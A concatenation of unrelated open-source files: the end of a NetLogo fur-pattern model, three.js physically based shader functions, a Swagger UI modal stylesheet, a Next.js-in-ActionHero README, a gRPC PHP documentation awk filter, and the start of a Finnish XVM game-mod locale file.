If you find a combination of slider and switch values that consistently give you the fur patterns of a favorite animal, you could create a button, for instance "Zebra," that sets the sliders to those values. That way, if you make several of these, you can go on a virtual safari tour by moving between your favorite animals. One such combination that you could set in a single button could be: INNER-RADIUS-X 3, INNER-RADIUS-Y 3, OUTER-RADIUS-X 6, OUTER-RADIUS-Y 6, INITIAL-DENSITY 50%, RATIO 0.35.
You could call this, perhaps, Fish.
How about adding more colors? What could be the logic here? If you introduced, say, red, you would have to decide on specific conditions under which that color would appear. Also, you'd have to decide how that color influences other cells.
## RELATED MODELS
Voting, in the Social Science section, is based on simpler rules but generates patterns that are similar in some respects.
## CREDITS AND REFERENCES
The mechanism of "diffusion-driven instability" was first proposed by Alan Turing in 1952. B.N. Nagorcka first proposed applying it to hair and fur. The particular variant presented in this model was proposed by David Young.
In building this model, we used information on this web site: http://users.math.yale.edu/public_html/People/frame/Fractals/Panorama/Biology/Leopard/Leopard.html
Research published in Nature Genetics (Economou et al, 2012) appears to confirm the mechanisms the model proposes.
http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3303118/
A news article in IO9 by Alasdair Wilkins describing the research can be found here.
http://io9.gizmodo.com/5886406/scientists-confirm-alan-turings-50-year-old-theory-for-why-tigers-have-stripes
Here is a quote from the Wilkins article:
>Turing's idea was that biological patterns --- such as a tiger's stripes or a
>leopard's spots - are formed by the interactions of a pair of morphogens, which
>are the signaling molecules that govern tissue development. The particular pair
>that Turing proposed was an activator and an inhibitor. Turing proposed that the
>activator would form something like a tiger's stripe, but then interaction with
>the inhibitor would shut down its expression, creating a blank space. Then the
>process would reverse, and the next stripe would form. The interaction of these
>two morphogens would combine to create the full stripe pattern.
>
>This hypothesis has remained mostly just speculation until now, as researchers
>at King's College London have now tested the idea in the mouths of mice. The
>roofs of mice's mouths contain regularly spaced ridges, and the researchers
>discovered the precise two morphogens that were working as activator and
>inhibitor to create the pattern, just as Turing suggested. What's more, when the
>researchers tampered with one morphogen or the other to increase or decrease
>their activity,the pattern of the ridges changed just as Turing's initial
>equations predicted they would. Researcher Dr. Jeremy Green adds:
>
>"Regularly spaced structures, from vertebrae and hair follicles to the stripes on
>a tiger or zebrafish, are a fundamental motif in biology. There are several
>theories about how patterns in nature are formed, but until now there was only
>circumstantial evidence for Turing's mechanism. Our study provides the first
>experimental identification of an activator-inhibitor system at work in the
>generation of stripes – in this case, in the ridges of the mouth palate.
>Although important in feeling and tasting food, ridges in the mouth are not of
>great medical significance. However, they have proven extremely valuable here in
>validating an old theory of the activator-inhibitor model first put forward by
>Alan Turing in the 50s."
Other new research published in the Journal of Experimental Biology (Egri et al, 2011) proposes an evolutionary explanation for the advantage conferred by stripes. http://jeb.biologists.org/content/215/5/736.abstract
Thanks to Seth Tisue and Dor Abrahamson for their work on this model.
## HOW TO CITE
If you mention this model or the NetLogo software in a publication, we ask that you include the citations below.
For the model itself:
* Wilensky, U. (2003). NetLogo Fur model. http://ccl.northwestern.edu/netlogo/models/Fur. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.
Please cite the NetLogo software as:
* Wilensky, U. (1999). NetLogo. http://ccl.northwestern.edu/netlogo/. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.
## COPYRIGHT AND LICENSE
Copyright 2003 Uri Wilensky.

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License. To view a copy of this license, visit https://creativecommons.org/licenses/by-nc-sa/3.0/ or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
Commercial licenses are also available. To inquire about commercial licenses, please contact Uri Wilensky at uri@northwestern.edu.
This model was created as part of the projects: PARTICIPATORY SIMULATIONS: NETWORK-BASED DESIGN FOR SYSTEMS LEARNING IN CLASSROOMS and/or INTEGRATED SIMULATION AND MODELING ENVIRONMENT. The project gratefully acknowledges the support of the National Science Foundation (REPP & ROLE programs) -- grant numbers REC #9814682 and REC-0126227.
<!-- 2003 -->
@#$#@#$#@
default
true
0
Polygon -7500403 true true 150 5 40 250 150 205 260 250
airplane
true
0
Polygon -7500403 true true 150 0 135 15 120 60 120 105 15 165 15 195 120 180 135 240 105 270 120 285 150 270 180 285 210 270 165 240 180 180 285 195 285 165 180 105 180 60 165 15
arrow
true
0
Polygon -7500403 true true 150 0 0 150 105 150 105 293 195 293 195 150 300 150
box
false
0
Polygon -7500403 true true 150 285 285 225 285 75 150 135
Polygon -7500403 true true 150 135 15 75 150 15 285 75
Polygon -7500403 true true 15 75 15 225 150 285 150 135
Line -16777216 false 150 285 150 135
Line -16777216 false 150 135 15 75
Line -16777216 false 150 135 285 75
bug
true
0
Circle -7500403 true true 96 182 108
Circle -7500403 true true 110 127 80
Circle -7500403 true true 110 75 80
Line -7500403 true 150 100 80 30
Line -7500403 true 150 100 220 30
butterfly
true
0
Polygon -7500403 true true 150 165 209 199 225 225 225 255 195 270 165 255 150 240
Polygon -7500403 true true 150 165 89 198 75 225 75 255 105 270 135 255 150 240
Polygon -7500403 true true 139 148 100 105 55 90 25 90 10 105 10 135 25 180 40 195 85 194 139 163
Polygon -7500403 true true 162 150 200 105 245 90 275 90 290 105 290 135 275 180 260 195 215 195 162 165
Polygon -16777216 true false 150 255 135 225 120 150 135 120 150 105 165 120 180 150 165 225
Circle -16777216 true false 135 90 30
Line -16777216 false 150 105 195 60
Line -16777216 false 150 105 105 60
car
false
0
Polygon -7500403 true true 300 180 279 164 261 144 240 135 226 132 213 106 203 84 185 63 159 50 135 50 75 60 0 150 0 165 0 225 300 225 300 180
Circle -16777216 true false 180 180 90
Circle -16777216 true false 30 180 90
Polygon -16777216 true false 162 80 132 78 134 135 209 135 194 105 189 96 180 89
Circle -7500403 true true 47 195 58
Circle -7500403 true true 195 195 58
circle
false
0
Circle -7500403 true true 0 0 300
circle 2
false
0
Circle -7500403 true true 0 0 300
Circle -16777216 true false 30 30 240
cow
false
0
Polygon -7500403 true true 200 193 197 249 179 249 177 196 166 187 140 189 93 191 78 179 72 211 49 209 48 181 37 149 25 120 25 89 45 72 103 84 179 75 198 76 252 64 272 81 293 103 285 121 255 121 242 118 224 167
Polygon -7500403 true true 73 210 86 251 62 249 48 208
Polygon -7500403 true true 25 114 16 195 9 204 23 213 25 200 39 123
cylinder
false
0
Circle -7500403 true true 0 0 300
dot
false
0
Circle -7500403 true true 90 90 120
face happy
false
0
Circle -7500403 true true 8 8 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Polygon -16777216 true false 150 255 90 239 62 213 47 191 67 179 90 203 109 218 150 225 192 218 210 203 227 181 251 194 236 217 212 240
face neutral
false
0
Circle -7500403 true true 8 7 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Rectangle -16777216 true false 60 195 240 225
face sad
false
0
Circle -7500403 true true 8 8 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Polygon -16777216 true false 150 168 90 184 62 210 47 232 67 244 90 220 109 205 150 198 192 205 210 220 227 242 251 229 236 206 212 183
fish
false
0
Polygon -1 true false 44 131 21 87 15 86 0 120 15 150 0 180 13 214 20 212 45 166
Polygon -1 true false 135 195 119 235 95 218 76 210 46 204 60 165
Polygon -1 true false 75 45 83 77 71 103 86 114 166 78 135 60
Polygon -7500403 true true 30 136 151 77 226 81 280 119 292 146 292 160 287 170 270 195 195 210 151 212 30 166
Circle -16777216 true false 215 106 30
flag
false
0
Rectangle -7500403 true true 60 15 75 300
Polygon -7500403 true true 90 150 270 90 90 30
Line -7500403 true 75 135 90 135
Line -7500403 true 75 45 90 45
flower
false
0
Polygon -10899396 true false 135 120 165 165 180 210 180 240 150 300 165 300 195 240 195 195 165 135
Circle -7500403 true true 85 132 38
Circle -7500403 true true 130 147 38
Circle -7500403 true true 192 85 38
Circle -7500403 true true 85 40 38
Circle -7500403 true true 177 40 38
Circle -7500403 true true 177 132 38
Circle -7500403 true true 70 85 38
Circle -7500403 true true 130 25 38
Circle -7500403 true true 96 51 108
Circle -16777216 true false 113 68 74
Polygon -10899396 true false 189 233 219 188 249 173 279 188 234 218
Polygon -10899396 true false 180 255 150 210 105 210 75 240 135 240
house
false
0
Rectangle -7500403 true true 45 120 255 285
Rectangle -16777216 true false 120 210 180 285
Polygon -7500403 true true 15 120 150 15 285 120
Line -16777216 false 30 120 270 120
leaf
false
0
Polygon -7500403 true true 150 210 135 195 120 210 60 210 30 195 60 180 60 165 15 135 30 120 15 105 40 104 45 90 60 90 90 105 105 120 120 120 105 60 120 60 135 30 150 15 165 30 180 60 195 60 180 120 195 120 210 105 240 90 255 90 263 104 285 105 270 120 285 135 240 165 240 180 270 195 240 210 180 210 165 195
Polygon -7500403 true true 135 195 135 240 120 255 105 255 105 285 135 285 165 240 165 195
line
true
0
Line -7500403 true 150 0 150 300
line half
true
0
Line -7500403 true 150 0 150 150
pentagon
false
0
Polygon -7500403 true true 150 15 15 120 60 285 240 285 285 120
person
false
0
Circle -7500403 true true 110 5 80
Polygon -7500403 true true 105 90 120 195 90 285 105 300 135 300 150 225 165 300 195 300 210 285 180 195 195 90
Rectangle -7500403 true true 127 79 172 94
Polygon -7500403 true true 195 90 240 150 225 180 165 105
Polygon -7500403 true true 105 90 60 150 75 180 135 105
plant
false
0
Rectangle -7500403 true true 135 90 165 300
Polygon -7500403 true true 135 255 90 210 45 195 75 255 135 285
Polygon -7500403 true true 165 255 210 210 255 195 225 255 165 285
Polygon -7500403 true true 135 180 90 135 45 120 75 180 135 210
Polygon -7500403 true true 165 180 165 210 225 180 255 120 210 135
Polygon -7500403 true true 135 105 90 60 45 45 75 105 135 135
Polygon -7500403 true true 165 105 165 135 225 105 255 45 210 60
Polygon -7500403 true true 135 90 120 45 150 15 180 45 165 90
square
false
0
Rectangle -7500403 true true 30 30 270 270
square 2
false
0
Rectangle -7500403 true true 30 30 270 270
Rectangle -16777216 true false 60 60 240 240
star
false
0
Polygon -7500403 true true 151 1 185 108 298 108 207 175 242 282 151 216 59 282 94 175 3 108 116 108
target
false
0
Circle -7500403 true true 0 0 300
Circle -16777216 true false 30 30 240
Circle -7500403 true true 60 60 180
Circle -16777216 true false 90 90 120
Circle -7500403 true true 120 120 60
tree
false
0
Circle -7500403 true true 118 3 94
Rectangle -6459832 true false 120 195 180 300
Circle -7500403 true true 65 21 108
Circle -7500403 true true 116 41 127
Circle -7500403 true true 45 90 120
Circle -7500403 true true 104 74 152
triangle
false
0
Polygon -7500403 true true 150 30 15 255 285 255
triangle 2
false
0
Polygon -7500403 true true 150 30 15 255 285 255
Polygon -16777216 true false 151 99 225 223 75 224
truck
false
0
Rectangle -7500403 true true 4 45 195 187
Polygon -7500403 true true 296 193 296 150 259 134 244 104 208 104 207 194
Rectangle -1 true false 195 60 195 105
Polygon -16777216 true false 238 112 252 141 219 141 218 112
Circle -16777216 true false 234 174 42
Rectangle -7500403 true true 181 185 214 194
Circle -16777216 true false 144 174 42
Circle -16777216 true false 24 174 42
Circle -7500403 false true 24 174 42
Circle -7500403 false true 144 174 42
Circle -7500403 false true 234 174 42
turtle
true
0
Polygon -10899396 true false 215 204 240 233 246 254 228 266 215 252 193 210
Polygon -10899396 true false 195 90 225 75 245 75 260 89 269 108 261 124 240 105 225 105 210 105
Polygon -10899396 true false 105 90 75 75 55 75 40 89 31 108 39 124 60 105 75 105 90 105
Polygon -10899396 true false 132 85 134 64 107 51 108 17 150 2 192 18 192 52 169 65 172 87
Polygon -10899396 true false 85 204 60 233 54 254 72 266 85 252 107 210
Polygon -7500403 true true 119 75 179 75 209 101 224 135 220 225 175 261 128 261 81 224 74 135 88 99
wheel
false
0
Circle -7500403 true true 3 3 294
Circle -16777216 true false 30 30 240
Line -7500403 true 150 285 150 15
Line -7500403 true 15 150 285 150
Circle -7500403 true true 120 120 60
Line -7500403 true 216 40 79 269
Line -7500403 true 40 84 269 221
Line -7500403 true 40 216 269 79
Line -7500403 true 84 40 221 269
x
false
0
Polygon -7500403 true true 270 75 225 30 30 225 75 270
Polygon -7500403 true true 30 75 75 30 270 225 225 270
@#$#@#$#@
NetLogo 6.0.2
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
default
0.0
-0.2 0 0.0 1.0
0.0 1 1.0 0.0
0.2 0 0.0 1.0
link direction
true
0
Line -7500403 true 150 150 90 180
Line -7500403 true 150 150 210 180
@#$#@#$#@
0
@#$#@#$#@
| NetLogo | 5 | fsancho/IA | 07. Complexity/Fur.nlogo | [
"MIT"
] |
import { ShaderNode,
add, addTo, sub, mul, div, saturate, dot, pow, pow2, exp2, normalize, max, sqrt, negate,
cond, greaterThan, and,
transformedNormalView, positionViewDirection,
diffuseColor, specularColor, roughness,
PI, RECIPROCAL_PI, EPSILON
} from '../ShaderNode.js';
// Schlick fresnel approximation ('94), using the exp2-based optimization of
// pow( 1.0 - dotVH, 5.0 ) presented by Epic at SIGGRAPH '13:
// https://cdn2.unrealengine.com/Resources/files/2013SiggraphPresentationsNotes-26915738.pdf
export const F_Schlick = new ShaderNode( ( { f0, f90, dotVH } ) => {

	const fresnelFactor = exp2( mul( sub( mul( - 5.55473, dotVH ), 6.98316 ), dotVH ) );

	// blend between normal-incidence reflectance f0 and grazing reflectance f90
	return add( mul( f0, sub( 1.0, fresnelFactor ) ), mul( f90, fresnelFactor ) );

} ); // validated
// Energy-conserving Lambertian diffuse term: albedo scaled by 1 / PI.
export const BRDF_Lambert = new ShaderNode( ( { diffuseColor } ) => {

	return mul( RECIPROCAL_PI, diffuseColor ); // punctual light

} ); // validated
// Distance attenuation for punctual lights:
// saturate( 1 - lightDistance / cutoffDistance ) ^ decayExponent when both
// cutoff and decay are positive, otherwise no attenuation (constant 1.0).
export const getDistanceAttenuation = new ShaderNode( ( { lightDistance, cutoffDistance, decayExponent } ) => {

	const hasAttenuation = and( greaterThan( cutoffDistance, 0 ), greaterThan( decayExponent, 0 ) );
	const falloff = pow( saturate( add( div( negate( lightDistance ), cutoffDistance ), 1.0 ) ), decayExponent );

	return cond( hasAttenuation, falloff, 1.0 );

} ); // validated
//
// STANDARD
//
// Moving Frostbite to Physically Based Rendering 3.0 - page 12, listing 2
// https://seblagarde.files.wordpress.com/2015/07/course_notes_moving_frostbite_to_pbr_v32.pdf
// Height-correlated Smith visibility term for GGX; the 4 * dotNL * dotNV
// denominator of the microfacet BRDF is folded into this expression.
export const V_GGX_SmithCorrelated = new ShaderNode( ( inputs ) => {
const { alpha, dotNL, dotNV } = inputs;
const a2 = pow2( alpha );
// symmetric lambda terms for the view and light directions
const gv = mul( dotNL, sqrt( add( a2, mul( sub( 1.0, a2 ), pow2( dotNV ) ) ) ) );
const gl = mul( dotNV, sqrt( add( a2, mul( sub( 1.0, a2 ), pow2( dotNL ) ) ) ) );
// EPSILON guards the division at grazing angles where gv + gl -> 0
return div( 0.5, max( add( gv, gl ), EPSILON ) );
} ); // validated
// Microfacet Models for Refraction through Rough Surfaces - equation (33)
// http://graphicrants.blogspot.com/2013/08/specular-brdf-reference.html
// alpha is "roughness squared" in Disney’s reparameterization
// GGX (Trowbridge-Reitz) normal distribution function.
export const D_GGX = new ShaderNode( ( inputs ) => {
const { alpha, dotNH } = inputs;
const a2 = pow2( alpha );
const denom = add( mul( pow2( dotNH ), sub( a2, 1.0 ) ), 1.0 ); // avoid alpha = 0 with dotNH = 1
// D = a2 / ( PI * denom^2 )
return mul( RECIPROCAL_PI, div( a2, pow2( denom ) ) );
} ); // validated
// GGX Distribution, Schlick Fresnel, GGX_SmithCorrelated Visibility
// Cook-Torrance style specular BRDF: F * V * D with Schlick fresnel,
// height-correlated Smith visibility and GGX distribution.
export const BRDF_GGX = new ShaderNode( ( inputs ) => {
const { lightDirection, f0, f90, roughness } = inputs;
const alpha = pow2( roughness ); // UE4's roughness
// half vector between the light and view directions
const halfDir = normalize( add( lightDirection, positionViewDirection ) );
// clamped cosines used by the three factors below
const dotNL = saturate( dot( transformedNormalView, lightDirection ) );
const dotNV = saturate( dot( transformedNormalView, positionViewDirection ) );
const dotNH = saturate( dot( transformedNormalView, halfDir ) );
const dotVH = saturate( dot( positionViewDirection, halfDir ) );
const F = F_Schlick( { f0, f90, dotVH } );
const V = V_GGX_SmithCorrelated( { alpha, dotNL, dotNV } );
const D = D_GGX( { alpha, dotNH } );
return mul( F, mul( V, D ) );
} ); // validated
// Direct-light response for the physical material: accumulates this light's
// diffuse (Lambert) and specular (GGX) contributions into the
// directDiffuse / directSpecular accumulator nodes via addTo (side effect,
// no return value).
export const RE_Direct_Physical = new ShaderNode( ( inputs ) => {
const { lightDirection, lightColor, directDiffuse, directSpecular } = inputs;
const dotNL = saturate( dot( transformedNormalView, lightDirection ) );
let irradiance = mul( dotNL, lightColor );
irradiance = mul( irradiance, PI ); // punctual light
addTo( directDiffuse, mul( irradiance, BRDF_Lambert( { diffuseColor } ) ) );
addTo( directSpecular, mul( irradiance, BRDF_GGX( { lightDirection, f0: specularColor, f90: 1, roughness } ) ) );
} );
// Entry point for the physical lighting model; only the direct-light term
// is evaluated here.
export const PhysicalLightingModel = new ShaderNode( ( inputs/*, builder*/ ) => {
// PHYSICALLY_CORRECT_LIGHTS <-> builder.renderer.physicallyCorrectLights === true
RE_Direct_Physical( inputs );
} );
| JavaScript | 5 | KostaMalsev/three.js | examples/jsm/renderers/nodes/functions/BSDFs.js | [
"MIT"
] |
// Full-screen modal dialog chrome: dimmed backdrop plus a centered modal
// window with header and scrollable content area.
.dialog-ux
{
position: fixed;
z-index: 9999;
top: 0;
right: 0;
bottom: 0;
left: 0;
// dimmed click-catching layer behind the modal
.backdrop-ux
{
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
background: rgba($dialog-ux-backdrop-background-color,.8);
}
// the modal window itself, centered via the translate(-50%,-50%) trick
.modal-ux
{
position: absolute;
z-index: 9999;
top: 50%;
left: 50%;
width: 100%;
min-width: 300px;
max-width: 650px;
transform: translate(-50%,-50%);
border: 1px solid $dialog-ux-modal-border-color;
border-radius: 4px;
background: $dialog-ux-modal-background-color;
box-shadow: 0 10px 30px 0 rgba($dialog-ux-modal-box-shadow-color,.20);
}
// scrollable body area of the modal
.modal-ux-content
{
overflow-y: auto;
max-height: 540px;
padding: 20px;
p
{
font-size: 12px;
margin: 0 0 5px 0;
color: $dialog-ux-modal-content-font-color;
@include text_body();
}
h4
{
font-size: 18px;
font-weight: 600;
margin: 15px 0 0 0;
@include text_headline();
}
}
// title bar: flexible heading on the left, close button on the right
.modal-ux-header
{
display: flex;
padding: 12px 0;
border-bottom: 1px solid $dialog-ux-modal-header-border-bottom-color;
align-items: center;
.close-modal
{
padding: 0 10px;
border: none;
background: none;
appearance: none;
}
h3
{
font-size: 20px;
font-weight: 600;
margin: 0;
padding: 0 20px;
flex: 1;
@include text_headline();
}
}
}
| SCSS | 4 | ilozano2/swagger-ui | src/style/_modal.scss | [
"Apache-2.0"
] |
# Running Next.JS and React /inside/ of ActionHero
This server will render dynamic next.js/react pages on some routes, and normal ActionHero API requests on others.<br>
This configuration works with both Next and ActionHero hot reloading of code.
A more detailed example showcasing how to use fetch and web sockets to interact with your API can be found here: https://github.com/actionhero/next-in-actionhero
## How to use
Execute [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app) with [npm](https://docs.npmjs.com/cli/init) or [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) to bootstrap the example:
```bash
npx create-next-app --example custom-server-actionhero custom-server-actionhero-app
# or
yarn create next-app --example custom-server-actionhero custom-server-actionhero-app
```
## How does this work?
1. Create an initializer to load next.js and create a handler that can extract the normal node `req` and `res` from the connection
```js
// initializers/next.js
const { Initializer, api } = require('actionhero')
const next = require('next')
module.exports = class NextInitializer extends Initializer {
constructor() {
super()
this.name = 'next'
}
async initialize() {
api.next = {
render: async (connection) => {
if (connection.type !== 'web') {
throw new Error('Connections for NEXT apps must be of type "web"')
}
const req = connection.rawConnection.req
const res = connection.rawConnection.res
return api.next.handle(req, res)
},
}
api.next.dev = api.env === 'development'
if (api.next.dev) {
api.log('Running next in development mode...')
}
api.next.app = next({ dev: api.next.dev })
api.next.handle = api.next.app.getRequestHandler()
await api.next.app.prepare()
}
async stop() {
await api.next.app.close()
}
}
```
2. Create an action which will run the above `api.next.render(connection)`. Note that we will not be relying on ActionHero to respond to the client's request in this case, and leave that up to next (via: `data.toRender = false`)
```js
// actions/next.js
const { Action, api } = require('actionhero')
module.exports = class CreateChatRoom extends Action {
constructor() {
super()
this.name = 'render'
this.description = 'I render the next.js react website'
}
async run(data) {
data.toRender = false
return api.next.render(data.connection)
}
}
```
3. Tell ActionHero to use the api rather than the file server as the top-level route in `api.config.servers.web.rootEndpointType = 'api'`. This will allow "/" to listen to API requests. Also update `api.config.general.paths.public = [ path.join(__dirname, '/../static') ]`. In this configuration, the next 'static' renderer will take priority over the ActionHero 'public file' api. Note that any static assets (CSS, fonts, etc) will need to be in "./static" rather than "./public".
Note that this is where the websocket server, if you enable it, will place the `ActionheroWebsocketClient` library.<br>
4. Configure a wild-card route at the lowest priority of your GET handler to catch all web requests that aren't caught by other actions:
```js
// config/routes.js
exports['default'] = {
routes: (api) => {
return {
get: [
{ path: '/time', action: 'time' },
{ path: '/', matchTrailingPathParts: true, action: 'render' },
],
}
},
}
```
| Markdown | 5 | blomqma/next.js | examples/custom-server-actionhero/README.md | [
"MIT"
] |
# Copyright 2020 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# the spaces in the parameter list are necessary to separate out local variables
# Portable stand-in for gawk's gensub(): performs the regexp/replacement
# substitution by piping `target` (default: $0) through `sed -nE`.
# `how` mirrors gensub's flag argument (e.g. "g"); the matched/replaced
# line is returned, and on pipeline failure `error` is set and the
# program exits.
function sed_gensub(regexp, replacement, how, target, cmd_, ret_) { # arguments and local variables
if (!target) {
target = $0
}
# escape single quotes so target survives the single-quoted shell string
gsub(/'/, "'\"'\"'", target);
gsub(/\\\\/, "\\", regexp);
cmd_ = "printf '" target "' | sed -nE 's/" regexp "/" replacement "/" tolower(how) "p'";
# NOTE(review): relies on this parsing as (cmd_ | getline ret_) != 1 --
# appears intentional (fails when the pipeline yields no line); confirm
# on the target awk implementations
if (cmd_ | getline ret_ != 1) {
close(cmd_);
error = "ERROR: running command: " cmd_ ", ret_: " ret_;
exit;
}
close(cmd_);
return ret_;
}
# Initialize parser state: accumulator tables for the classes, methods and
# constants discovered in the gRPC PHP extension C sources, plus the
# regexes that recognize the relevant declaration lines.
BEGIN {
namespace = "Grpc";
className = "";
classDocComment = "";
delete methodNames; # i => methodName
delete methodArgs; # methodName => concatenatedArgsStr
delete methodDocs; # methodName => methodDocCommentStr
delete methodStatics; # methodName => 1 if static
methodsCount = 0;
delete constantNames; # i => constantName
delete constantDocs; # constantName => constantDocCommentStr
constantsCount = 0;
# * class className
classLineRegex = "^ \\* class ([^ \t]+)$";
# @param type name [= default]
paramLineRegex = "^.*@param[ \t]+[^ \t]+[ \t]+(\\$[^ \t]+([ \t]+=[ \t]+[^ \t]+)?)[ \t]+.*$";
# PHP_METHOD(class, function)
phpMethodLineRegex = "^PHP_METHOD\\(([^ \t]+),[ \t]*([^ \t]+)\\).*$";
# PHP_ME(class, function, arginfo, flags)
phpMeLineRegex = "^[ \t]*PHP_ME\\(([^ \t]+),[ \t]*([^ \t]+),.*$";
# REGISTER_LONG_CONSTANT("namespace\\constant", grpcConstant, ..)
phpConstantLineRegs = "^[ \t]*REGISTER_LONG_CONSTANT\\(\"Grpc\\\\\\\\([^ \t]+)\",.*$";
error = "";
# extension testing methods, hidden from the generated documentation
hideMethods["Channel::getChannelInfo"] = 1;
hideMethods["Channel::cleanPersistentList"] = 1;
hideMethods["Channel::getPersistentList"] = 1;
}
# '/**' document comment start
/^[ \t]*\/\*\*/ {
    inDocComment = 1;
    docComment = "";
    delete args;
    argsCount = 0;
}
# collect document comment
inDocComment==1 {
    docComment = docComment"\n"$0
}
# class document, must match ' * class <className>'
inDocComment==1 && $0 ~ classLineRegex {
    className = sed_gensub(classLineRegex, "\\1", "g");
}
# end of class document
inDocComment==1 && /\*\// && className && classDocComment == "" {
    classDocComment = docComment;
    docComment = "";
}
# param line
inDocComment==1 && $0 ~ paramLineRegex {
    arg = sed_gensub(paramLineRegex, "\\1", "g");
    args[argsCount++]=arg;
}
# '*/' document comment end
inDocComment==1 && /\*\// {
    inDocComment = 0;
}
# PHP_METHOD
$0 ~ phpMethodLineRegex {
    class = sed_gensub(phpMethodLineRegex, "\\1", "g");
    if (class != className) {
        error = "ERROR: Missing or mismatch class names, in class comment block: " \
            className ", in PHP_METHOD: " class;
        exit;
    };
    method = sed_gensub(phpMethodLineRegex, "\\2", "g");
    methodNames[methodsCount++] = method;
    methodDocs[method] = docComment;
    # concat args
    if (argsCount > 0) {
        methodArgs[method] = args[0];
        for (i = 1; i < argsCount; i++) {
            methodArgs[method] = methodArgs[method] ", " args[i];
        }
    }
    docComment = "";
}
# PHP_ME(class, function,...
$0 ~ phpMeLineRegex {
    inPhpMe = 1;
    class = sed_gensub(phpMeLineRegex, "\\1", "g");
    if (class != className) {
        error = "ERROR: Missing or mismatch class names, in class comment block: " \
            className ", in PHP_ME: " class;
        exit;
    };
    method = sed_gensub(phpMeLineRegex, "\\2", "g");
}
# ZEND_ACC_STATIC
inPhpMe && /ZEND_ACC_STATIC/ {
    methodStatics[method] = 1;
}
# closing bracket of PHP_ME(...)
# BUG FIX: was `iinPhpMe` (undefined, always false), so inPhpMe never
# reset and a later ZEND_ACC_STATIC outside a PHP_ME entry could mark
# the previous method static.
inPhpMe && /\)$/ {
    inPhpMe = 0;
}
# REGISTER_LONG_CONSTANT(constant, ...
$0 ~ phpConstantLineRegs {
    inPhpConstant = 1;
    constant = sed_gensub(phpConstantLineRegs, "\\1", "g");
    constantNames[constantsCount++] = constant;
    constantDocs[constant] = docComment;
}
# closing bracket of REGISTER_LONG_CONSTANT(...)
inPhpConstant && /\)[ \t]*;[ \t]*$/ {
    inPhpConstant = 0;
    docComment = "";
}
# Emit the collected API as a PHP stub: a namespace wrapper, the class
# with one empty method per PHP_METHOD entry, and one constant per
# REGISTER_LONG_CONSTANT.  A recorded error aborts with exit status 1.
END {
    if (error) {
        print error > "/dev/stderr";
        exit 1;
    }
    print "<?php\n"
    print "namespace " namespace "{";
    if (className != "") {
        print classDocComment
        print "class " className " {";
        for (i = 0; i < methodsCount; i++) {
            m = methodNames[i];
            if (hideMethods[className"::"m]) continue;  # skip extension-testing methods
            print methodDocs[m];
            printf "public"
            if (methodStatics[m]) printf " static"
            printf " function " m "("
            printf methodArgs[m];
            print ") {}";
        }
        print "\n}";
    }
    for (i = 0; i < constantsCount; i++) {
        print constantDocs[constantNames[i]];
        print "const " constantNames[i] " = 0;";
    }
    print "\n}";
}
| Awk | 4 | arghyadip01/grpc | src/php/bin/php_extension_doxygen_filter.awk | [
"Apache-2.0"
] |
{
"locale": {
"XVM_translator": "Mikael Palokangas, Seula, Taifuuni and Tuomas Rantalainen",
"Initialization": "Alustus",
"New version available": "Uusi versio on saatavilla",
"Chance error": "Todennäköisyyden epävarmuus",
"Chance to win": "Voittotodennäköisyys",
"chanceLive": "Live",
"chanceBattleTier": "T",
"attack": "osuma",
"fire": "tulipalo",
"ramming": "törmäys",
"world_collision": "putoaminen",
"Hits": "Osumat",
"Total": "Yhteensä",
"Last": "Viimeisin",
"hpLeftTitle": "Jäljellä olevat kestopisteet:",
"enemyBaseCapture": "Omat valtaavat tukikohtaa!",
"enemyBaseCaptured": "Omat valtasivat tukikohdan!!",
"allyBaseCapture": "Viholliset valtaavat tukikohtaanne!",
"allyBaseCaptured": "Viholliset valtasivat tukikohtanne!",
"Timeleft": "Aikaa jäljellä",
"Capturers": "Valtaajia",
"Hit percent": "Osumaprosentti",
"Damage (assisted / own)": "Vahinko (avustettu / aiheutettu)",
"Friend": "Liittolainen",
"Ignored": "Sivuutettu",
"unknown": "ei tietoa",
"Fights": "Taistelut",
"Wins": "Voitot",
"Data was updated at": "Tiedot päivitetty",
"Load statistics": "Lataa tilastot",
"General stats": "Yleiset tilastot",
"Summary": "Yhteenveto",
"Avg level": "Keskim. taso",
"WN6": "WN6",
"WN8": "WN8",
"EFF": "EFF",
"updated": "päivitetty",
" to ": " to ",
"avg": "keskim.",
"top": "ylin",
"draws": "tasapelit",
"Maximum damage": "Vahinkoennätys",
"Specific damage (Avg dmg / HP)": "Suhteellinen vahinko (Keskim. vahinko / KP)",
"Capture points": "Valtauspisteet",
"Defence points": "Puolustuspisteet",
"Filter": "Suodatin",
"Extra data (WoT 0.8.8+)": "Lisätiedot (WOT 0.8.8+)",
"Average battle time": "Keskitaisteluaika",
"Average battle time per day": "Keskitaisteluaika päivässä",
"Battles after 0.8.8": "Taistelut 0.8.8 jälkeen",
"Average experience": "Keskikokemus",
"Average experience without premium": "Keskikokemus ilman premiumia",
"Average distance driven per battle": "Keskiajomatka taistelussa",
"Average woodcuts per battle": "Keskim. kaadettuja puita taistelussa",
"Average damage assisted": "Keskiavustusvahinko",
" by tracking": " seuranneena",
" by spotting": " havainneena",
"Average HE shells fired (splash)": "Keskim. HE ammuksia ammuttu (sirpale)",
"Average HE shells received (splash)": "Keskim. HE ammuksia saatu (sirpale)",
"Average penetrations per battle": "Keskiläpäisyt taistelussa",
"Average hits received": "Osumia saatu keskimäärin",
